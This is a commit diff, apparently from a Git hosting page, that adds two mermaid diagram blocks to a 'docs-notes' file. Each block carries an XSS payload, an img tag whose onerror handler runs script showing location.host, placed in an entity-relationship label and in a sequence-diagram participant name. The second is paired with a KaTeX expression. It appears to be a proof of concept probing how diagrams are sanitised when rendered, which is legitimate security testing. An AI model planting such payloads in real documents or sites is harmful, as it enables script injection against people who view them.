1 changed files with 11 additions and 2 deletions
@ -1,3 +1,12 @@ |
|||
# docs-notes |
|||
notes |
|||
|
|||
notes |
|||
```mermaid |
|||
erDiagram |
|||
A ||--o{ B : "<img src=x onerror=window.__mx||(window.__mx=1,alert(location.host))>" |
|||
``` |
|||
|
|||
```mermaid |
|||
sequenceDiagram |
|||
participant A as Alice<img src=x onerror=window.__mx||(window.__mx=1,alert(location.host))>$$\text{A}$$ |
|||
A->>B: hi |
|||
``` |
|||
|
|||
Loading…
Reference in new issue